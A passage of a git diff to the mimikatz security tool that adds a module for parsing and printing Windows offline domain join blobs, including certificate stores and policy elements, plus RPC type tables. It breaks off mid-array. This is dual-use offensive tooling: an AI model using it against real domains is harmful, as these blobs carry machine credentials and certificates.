+ }
+ }
+ else kprintf(L" \n");
+}
+
+void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_LIST_descr(DWORD level, POP_POLICY_ELEMENT_LIST pElementList)
+{
+ DWORD i;
+
+ kprintf_level(L"[OP_POLICY_ELEMENT_LIST]\n");
+ level++;
+ kprintf_level(L"pSource : %s\n", pElementList->pSource);
+ kprintf_level(L"ulRootKeyId: 0x%08x\n", pElementList->ulRootKeyId);
+ kprintf_level(L"cElements : %u\n", pElementList->cElements);
+ for (i = 0; i < pElementList->cElements; i++)
+ {
+ kprintf_level(L"[%u] Element\n", i);
+ kuhl_m_misc_djoin_OP_POLICY_ELEMENT_descr(level + 1, pElementList->pElements + i);
+ }
+}
+
+void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_descr(DWORD level, POP_POLICY_ELEMENT pElement)
+{
+ kprintf_level(L"[OP_POLICY_ELEMENT]\n");
+ level++;
+ kprintf_level(L"pKeyPath : %s\n", pElement->pKeyPath);
+ kprintf_level(L"pValueName : %s\n", pElement->pValueName);
+ kprintf_level(L"ulValueType: 0x%08x\n", pElement->ulValueType);
+ kprintf_level(L"value : ");
+ switch (pElement->ulValueType)
+ {
+ case REG_SZ:
+ kprintf(L"%s\n", pElement->pValueData);
+ break;
+
+ case REG_BINARY:
+ default:
+ kprintf(L"%p (%u)\n", pElement->pValueData, pElement->cbValueData);
+ //kprinthex16(pElement->pValueData, pElement->cbValueData);
+ }
+}
\ No newline at end of file
diff --git a/mimikatz/modules/misc/kuhl_m_misc_djoin.h b/mimikatz/modules/misc/kuhl_m_misc_djoin.h
new file mode 100644
index 0000000..b8e46a5
--- /dev/null
+++ b/mimikatz/modules/misc/kuhl_m_misc_djoin.h
@@ -0,0 +1,29 @@
+/* Benjamin DELPY `gentilkiwi`
+ https://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#pragma once
+#include "../kuhl_m_misc.h"
+#include "../../../modules/kull_m_crypto.h"
+#include "../../../modules/rpc/kull_m_rpc_ms-odj.h"
+
+void kuhl_m_misc_djoin(int argc, wchar_t* argv[]);
+
+void kuhl_m_misc_djoin_ODJ_PROVISION_DATA_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
+
+void kuhl_m_misc_djoin_ODJ_WIN7BLOB_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
+void kuhl_m_misc_djoin_OP_PACKAGE_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
+void kuhl_m_misc_djoin_OP_PACKAGE_PART_COLLECTION_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
+void kuhl_m_misc_djoin_OP_PACKAGE_PART_descr(DWORD level, POP_PACKAGE_PART pOpPackagePart);
+
+void kuhl_m_misc_djoin_OP_JOINPROV2_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
+void kuhl_m_misc_djoin_OP_JOINPROV3_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
+
+void kuhl_m_misc_djoin_OP_CERT_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
+void kuhl_m_misc_djoin_OP_CERT_PFX_STORE_descr(DWORD level, POP_CERT_PFX_STORE pPfxStore);
+void kuhl_m_misc_djoin_OP_CERT_SST_STORE_descr(DWORD level, POP_CERT_SST_STORE pSstStore);
+
+void kuhl_m_misc_djoin_OP_POLICY_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
+void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_LIST_descr(DWORD level, POP_POLICY_ELEMENT_LIST pElementList);
+void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_descr(DWORD level, POP_POLICY_ELEMENT pElement);
\ No newline at end of file
diff --git a/modules/kull_m_crypto.c b/modules/kull_m_crypto.c
index 83200ba..d4462df 100644
--- a/modules/kull_m_crypto.c
+++ b/modules/kull_m_crypto.c
@@ -5,6 +5,8 @@
*/
#include "kull_m_crypto.h"
+const PCWSTR KULL_M_CRYPTO_UNK = L"?";
+
BOOL kull_m_crypto_hash(ALG_ID algid, LPCVOID data, DWORD dataLen, LPVOID hash, DWORD hashWanted)
{
BOOL status = FALSE;
@@ -991,6 +993,23 @@ DWORD kull_m_crypto_system_store_to_dword(PCWSTR name)
return 0;
}
+PCWSTR kull_m_crypto_system_store_to_name(DWORD dwStore)
+{
+ DWORD i;
+ PCWSTR ret = KULL_M_CRYPTO_UNK;
+
+ for (i = 0; i < ARRAYSIZE(kull_m_crypto_system_stores); i++)
+ {
+ if (kull_m_crypto_system_stores[i].id == dwStore)
+ {
+ ret = kull_m_crypto_system_stores[i].name + 18;
+ break;
+ }
+ }
+
+ return ret;
+}
+
DWORD kull_m_crypto_provider_type_to_dword(PCWSTR name)
{
DWORD i;
diff --git a/modules/kull_m_crypto.h b/modules/kull_m_crypto.h
index 9d36b03..8ac5c02 100644
--- a/modules/kull_m_crypto.h
+++ b/modules/kull_m_crypto.h
@@ -164,6 +164,7 @@ typedef struct _KULL_M_CRYPTO_DUAL_STRING_STRING {
#define CERT_keyid_file_element 35
DWORD kull_m_crypto_system_store_to_dword(PCWSTR name);
+PCWSTR kull_m_crypto_system_store_to_name(DWORD dwStore);
DWORD kull_m_crypto_provider_type_to_dword(PCWSTR name);
PCWSTR kull_m_crypto_provider_type_to_name(const DWORD dwProvType);
PCWCHAR kull_m_crypto_provider_to_realname(PCWSTR name);
diff --git a/modules/kull_m_process.h b/modules/kull_m_process.h
index aa6ca9d..c5ec74f 100644
--- a/modules/kull_m_process.h
+++ b/modules/kull_m_process.h
@@ -266,19 +266,27 @@ typedef struct _PEB_LDR_DATA {
LIST_ENTRY InInitializationOrderModulevector;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
+typedef struct _RTL_USER_PROCESS_PARAMETERS {
+ BYTE Reserved1[16];
+ PVOID Reserved2[10];
+ UNICODE_STRING ImagePathName;
+ UNICODE_STRING CommandLine;
+} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
+
typedef struct _PEB {
- BOOLEAN InheritedAddressSpace;
- BOOLEAN ReadImageFileExecOptions;
- BOOLEAN BeingDebugged;
+ BOOLEAN InheritedAddressSpace;
+ BOOLEAN ReadImageFileExecOptions;
+ BOOLEAN BeingDebugged;
struct BitField {
- BYTE ImageUsesLargePages :1;
- BYTE SpareBits :7;
+ BYTE ImageUsesLargePages : 1;
+ BYTE SpareBits : 7;
};
- HANDLE Mutant;
- PVOID ImageBaseAddress;
+ HANDLE Mutant;
+ PVOID ImageBaseAddress;
PPEB_LDR_DATA Ldr;
+ PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
/// ...
-} PEB, *PPEB;
+} PEB, * PPEB;
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
typedef struct _LSA_UNICODE_STRING_F32 {
diff --git a/modules/rpc/kull_m_rpc_ms-odj.c b/modules/rpc/kull_m_rpc_ms-odj.c
new file mode 100644
index 0000000..67ac427
--- /dev/null
+++ b/modules/rpc/kull_m_rpc_ms-odj.c
@@ -0,0 +1,282 @@
+#include "kull_m_rpc_ms-odj.h"
+
+const GUID
+ GUID_JOIN_PROVIDER = { 0x631c7621, 0x5289, 0x4321, {0xbc, 0x9e, 0x80, 0xf8, 0x43, 0xf8, 0x68, 0xc3} },
+ GUID_JOIN_PROVIDER2 = { 0x57bfc56b, 0x52f9, 0x480c, {0xad, 0xcb, 0x91, 0xb3, 0xf8, 0xa8, 0x23, 0x17} },
+ GUID_JOIN_PROVIDER3 = { 0xfc0ccf25, 0x7ffa, 0x474a, {0x86, 0x11, 0x69, 0xff, 0xe2, 0x69, 0x64, 0x5f} },
+ GUID_CERT_PROVIDER = { 0x9c0971e9, 0x832f, 0x4873, {0x8e, 0x87, 0xef, 0x14, 0x19, 0xd4, 0x78, 0x1e} },
+ GUID_POLICY_PROVIDER = { 0x68fb602a, 0x0c09, 0x48ce, {0xb7, 0x5f, 0x07, 0xb7, 0xbd, 0x58, 0xf7, 0xec} };
+
+#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
+#define ODJ_PROVISION_DATA_Offset 2
+#define OP_PACKAGE_PART_Offset 72
+#define OP_PACKAGE_PART_COLLECTION_Offset 146
+#define OP_PACKAGE_Offset 192
+#define ODJ_WIN7BLOB_Offset 224
+#define OP_JOINPROV2_PART_Offset 418
+#define OP_JOINPROV3_PART_Offset 456
+#define OP_POLICY_PART_Offset 476
+#define OP_CERT_PART_Offset 604
+const UCHAR ms2Dodj__MIDL_TypeFormatString[] = {
+ 0x00, 0x00, 0x12, 0x00, 0x34, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x04, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x06, 0x00, 0x08, 0x08, 0x36, 0x5b, 0x12, 0x00,
+ 0xe6, 0xff, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x04, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xde, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x06, 0x00,
+ 0x08, 0x08, 0x36, 0x5b, 0x12, 0x00, 0xdc, 0xff, 0x12, 0x00, 0x30, 0x00, 0x1d, 0x00, 0x08, 0x00, 0x01, 0x5b, 0x15, 0x03, 0x10, 0x00, 0x08, 0x06, 0x06, 0x4c, 0x00, 0xf1, 0xff, 0x5b, 0x1b, 0x00,
+ 0x01, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x06, 0x00, 0x08, 0x40, 0x36, 0x5b, 0x12, 0x00, 0xe6, 0xff, 0x1a, 0x03, 0x38, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x4c, 0x00, 0xce, 0xff, 0x08, 0x40, 0x4c, 0x00, 0xe0, 0xff, 0x4c, 0x00, 0xdc, 0xff, 0x5c, 0x5b, 0x12, 0x00, 0x18, 0x00, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00,
+ 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xd2, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x20, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x08, 0x40, 0x36, 0x4c, 0x00, 0xb1, 0xff, 0x5b, 0x12, 0x00, 0xd8, 0xff,
+ 0x12, 0x00, 0x02, 0x00, 0x1a, 0x03, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x00, 0x84, 0xff, 0x4c, 0x00, 0x98, 0xff, 0x4c, 0x00, 0x94, 0xff, 0x08, 0x40, 0x4c, 0x00, 0x8e, 0xff, 0x5c, 0x5b,
+ 0x12, 0x00, 0x9e, 0x00, 0x1c, 0x01, 0x02, 0x00, 0x17, 0x55, 0x02, 0x00, 0x01, 0x00, 0x17, 0x55, 0x00, 0x00, 0x01, 0x00, 0x05, 0x5b, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x08, 0x00, 0x06, 0x06,
+ 0x40, 0x36, 0x5c, 0x5b, 0x12, 0x00, 0xde, 0xff, 0x1d, 0x00, 0x06, 0x00, 0x02, 0x5b, 0x15, 0x00, 0x06, 0x00, 0x4c, 0x00, 0xf4, 0xff, 0x5c, 0x5b, 0x1b, 0x03, 0x04, 0x00, 0x04, 0x00, 0xf9, 0xff,
+ 0x01, 0x00, 0x08, 0x5b, 0x17, 0x03, 0x08, 0x00, 0xf0, 0xff, 0x02, 0x02, 0x4c, 0x00, 0xe0, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x48, 0x00, 0x00, 0x00, 0x14, 0x00, 0x4c, 0x00, 0xba, 0xff, 0x4c, 0x00,
+ 0xb6, 0xff, 0x4c, 0x00, 0xb2, 0xff, 0x4c, 0x00, 0x0a, 0xff, 0x36, 0x5b, 0x12, 0x00, 0xd6, 0xff, 0x1a, 0x03, 0x50, 0x00, 0x00, 0x00, 0x12, 0x00, 0x36, 0x36, 0x08, 0x4c, 0x00, 0xf5, 0xfe, 0x40,
+ 0x36, 0x36, 0x08, 0x40, 0x36, 0x36, 0x5c, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c,
+ 0x1a, 0x03, 0xb8, 0x00, 0x00, 0x00, 0x10, 0x00, 0x36, 0x36, 0x36, 0x4c, 0x00, 0xa5, 0xff, 0x4c, 0x00, 0xbf, 0xff, 0x08, 0x40, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08,
+ 0x25, 0x5c, 0x12, 0x00, 0x02, 0x00, 0x1a, 0x03, 0x30, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x08, 0x40, 0x36, 0x36, 0x36, 0x08, 0x40, 0x36, 0x5c, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c,
+ 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x00, 0x02, 0x00, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x06, 0x00, 0x08, 0x40, 0x36, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x00, 0x6a, 0x00,
+ 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x14, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x20, 0x00, 0x00, 0x00, 0x08, 0x00, 0x36, 0x36, 0x08, 0x08, 0x36, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08,
+ 0x25, 0x5c, 0x12, 0x00, 0xdc, 0xff, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x0c, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xd4, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x18, 0x00,
+ 0x00, 0x00, 0x08, 0x00, 0x36, 0x08, 0x08, 0x36, 0x5c, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x00, 0xd6, 0xff, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff,
+ 0x00, 0x00, 0x4c, 0x00, 0xd8, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x20, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x08, 0x40, 0x36, 0x4c, 0x00, 0x15, 0xfe, 0x5b, 0x12, 0x00, 0xd8, 0xff, 0x12, 0x00, 0x82, 0x00,
+ 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x28, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x38, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x36, 0x08, 0x40, 0x36, 0x08, 0x40, 0x36, 0x08, 0x40, 0x36, 0x5c, 0x5b,
+ 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x00, 0xd2, 0xff, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00,
+ 0x4c, 0x00, 0xca, 0xff, 0x5c, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x10, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x20, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x08, 0x40, 0x36, 0x08, 0x40, 0x36,
+ 0x5c, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x00, 0xde, 0xff, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x10, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xd6, 0xff, 0x5c, 0x5b,
+ 0x1a, 0x03, 0x30, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x08, 0x40, 0x36, 0x08, 0x40, 0x36, 0x4c, 0x00, 0x7a, 0xfd, 0x5c, 0x5b, 0x12, 0x00, 0x9a, 0xff, 0x12, 0x00, 0xd0, 0xff, 0x00,
+};
+#elif defined(_M_IX86)
+#define ODJ_PROVISION_DATA_Offset 2
+#define OP_PACKAGE_PART_Offset 96
+#define OP_PACKAGE_PART_COLLECTION_Offset 180
+#define OP_PACKAGE_Offset 270
+#define ODJ_WIN7BLOB_Offset 360
+#define OP_JOINPROV2_PART_Offset 700
+#define OP_JOINPROV3_PART_Offset 758
+#define OP_POLICY_PART_Offset 782
+#define OP_CERT_PART_Offset 998
+const UCHAR ms2Dodj__MIDL_TypeFormatString[] = {
+ 0x00, 0x00, 0x12, 0x00, 0x46, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x04, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, 0x0c, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x08, 0x00, 0x08, 0x00, 0x12, 0x00,
+ 0xe6, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x5c, 0x5b, 0x1b, 0x03, 0x0c, 0x00, 0x19, 0x00, 0x04, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x0c, 0x00, 0x00, 0x00, 0x01, 0x00, 0x08, 0x00, 0x08, 0x00,
+ 0x12, 0x00, 0xc4, 0xff, 0x5b, 0x4c, 0x00, 0xcb, 0xff, 0x5b, 0x16, 0x03, 0x0c, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x08, 0x00, 0x08, 0x00, 0x12, 0x00, 0xd0, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x5c, 0x5b,
+ 0x12, 0x00, 0x2c, 0x00, 0x1d, 0x00, 0x08, 0x00, 0x01, 0x5b, 0x15, 0x03, 0x10, 0x00, 0x08, 0x06, 0x06, 0x4c, 0x00, 0xf1, 0xff, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x14, 0x00, 0x01, 0x00,
+ 0x02, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x1c, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, 0x24, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0xda, 0xff, 0x46, 0x5c,
+ 0x20, 0x00, 0x20, 0x00, 0x12, 0x00, 0xdc, 0xff, 0x5b, 0x4c, 0x00, 0xbf, 0xff, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5c, 0x5b, 0x12, 0x00, 0x38, 0x00, 0x1b, 0x03, 0x24, 0x00, 0x19, 0x00, 0x00, 0x00,
+ 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x24, 0x00, 0x00, 0x00, 0x02, 0x00, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0xa4, 0xff, 0x20, 0x00, 0x20, 0x00, 0x12, 0x00, 0xa8, 0xff, 0x5b, 0x4c, 0x00, 0xaf,
+ 0xff, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x08, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, 0x10, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x00, 0xbc, 0xff, 0x46, 0x5c,
+ 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0xdc, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x12, 0x00, 0x26, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x10, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1b, 0x00,
+ 0x01, 0x00, 0x19, 0x00, 0x18, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x24, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, 0x2c, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x14, 0x00,
+ 0x14, 0x00, 0x12, 0x00, 0xce, 0xff, 0x46, 0x5c, 0x1c, 0x00, 0x1c, 0x00, 0x12, 0x00, 0xd0, 0xff, 0x46, 0x5c, 0x28, 0x00, 0x28, 0x00, 0x12, 0x00, 0xd2, 0xff, 0x5b, 0x4c, 0x00, 0x0d, 0xff, 0x08,
+ 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5c, 0x5b, 0x12, 0x00, 0xb2, 0x00, 0x16, 0x03, 0x30, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x04, 0x00,
+ 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x1c, 0x00, 0x1c, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x20, 0x00, 0x20, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x28, 0x00, 0x28, 0x00,
+ 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x2c, 0x00, 0x2c, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x5b, 0x08, 0x08, 0x08, 0x4c, 0x00, 0xb6, 0xfe, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x1c, 0x01, 0x02, 0x00,
+ 0x17, 0x55, 0x0e, 0x00, 0x01, 0x00, 0x17, 0x55, 0x0c, 0x00, 0x01, 0x00, 0x05, 0x5b, 0x1c, 0x01, 0x02, 0x00, 0x17, 0x55, 0x16, 0x00, 0x01, 0x00, 0x17, 0x55, 0x14, 0x00, 0x01, 0x00, 0x05, 0x5b,
+ 0x1c, 0x01, 0x02, 0x00, 0x17, 0x55, 0x1e, 0x00, 0x01, 0x00, 0x17, 0x55, 0x1c, 0x00, 0x01, 0x00, 0x05, 0x5b, 0x1d, 0x00, 0x06, 0x00, 0x02, 0x5b, 0x15, 0x00, 0x06, 0x00, 0x4c, 0x00, 0xf4, 0xff,
+ 0x5c, 0x5b, 0x1b, 0x03, 0x04, 0x00, 0x04, 0x00, 0xf9, 0xff, 0x01, 0x00, 0x08, 0x5b, 0x17, 0x03, 0x08, 0x00, 0xf0, 0xff, 0x02, 0x02, 0x4c, 0x00, 0xe0, 0xff, 0x5c, 0x5b, 0x16, 0x03, 0x6c, 0x00,
+ 0x4b, 0x5c, 0x46, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x08, 0x00, 0x08, 0x00, 0x12, 0x08, 0x25, 0x5c,
+ 0x46, 0x5c, 0x10, 0x00, 0x10, 0x00, 0x12, 0x00, 0x74, 0xff, 0x46, 0x5c, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0x7c, 0xff, 0x46, 0x5c, 0x20, 0x00, 0x20, 0x00, 0x12, 0x00, 0x84, 0xff, 0x46, 0x5c,
+ 0x34, 0x00, 0x34, 0x00, 0x12, 0x00, 0xa8, 0xff, 0x46, 0x5c, 0x38, 0x00, 0x38, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x3c, 0x00, 0x3c, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x54, 0x00,
+ 0x54, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x58, 0x00, 0x58, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x60, 0x00, 0x60, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x64, 0x00, 0x64, 0x00,
+ 0x12, 0x08, 0x25, 0x5c, 0x5b, 0x08, 0x08, 0x08, 0x06, 0x06, 0x08, 0x06, 0x06, 0x08, 0x06, 0x06, 0x08, 0x4c, 0x00, 0xb7, 0xfd, 0x08, 0x4c, 0x00, 0xb4, 0xfe, 0x08, 0x5b, 0x12, 0x00, 0x02, 0x00,
+ 0x16, 0x03, 0x18, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x08, 0x00, 0x08, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00,
+ 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x14, 0x00, 0x14, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x12, 0x00, 0x02, 0x00, 0x16, 0x03, 0x08, 0x00, 0x4b, 0x5c,
+ 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x5b, 0x08, 0x08, 0x5b, 0x12, 0x00, 0xb6, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x0c, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03,
+ 0x14, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x10, 0x00, 0x10, 0x00, 0x12, 0x00,
+ 0xd2, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5c, 0x5b, 0x1b, 0x03, 0x14, 0x00, 0x19, 0x00, 0x08, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x14, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x10, 0x00, 0x10, 0x00, 0x12, 0x00, 0x9e, 0xff, 0x5b, 0x4c, 0x00, 0xa5, 0xff, 0x5b, 0x16, 0x03, 0x10, 0x00,
+ 0x4b, 0x5c, 0x46, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0xb6, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x1b, 0x03, 0x10, 0x00,
+ 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0x8c, 0xff,
+ 0x5b, 0x4c, 0x00, 0xb9, 0xff, 0x5b, 0x16, 0x03, 0x10, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x00, 0xc8, 0xff, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0x04, 0xfd,
+ 0x5b, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x12, 0x00, 0xbe, 0x00, 0x16, 0x03, 0x1c, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x08, 0x00, 0x08, 0x00,
+ 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x10, 0x00, 0x10, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0x60, 0xfc, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08,
+ 0x5c, 0x5b, 0x1b, 0x03, 0x1c, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x1c, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x08, 0x00,
+ 0x08, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x10, 0x00, 0x10, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0x22, 0xfc, 0x5b, 0x4c, 0x00, 0x91, 0xff, 0x5b, 0x16, 0x03, 0x10, 0x00,
+ 0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0x6e, 0xfc, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x1b, 0x03, 0x10, 0x00,
+ 0x19, 0x00, 0x08, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0x44, 0xfc,
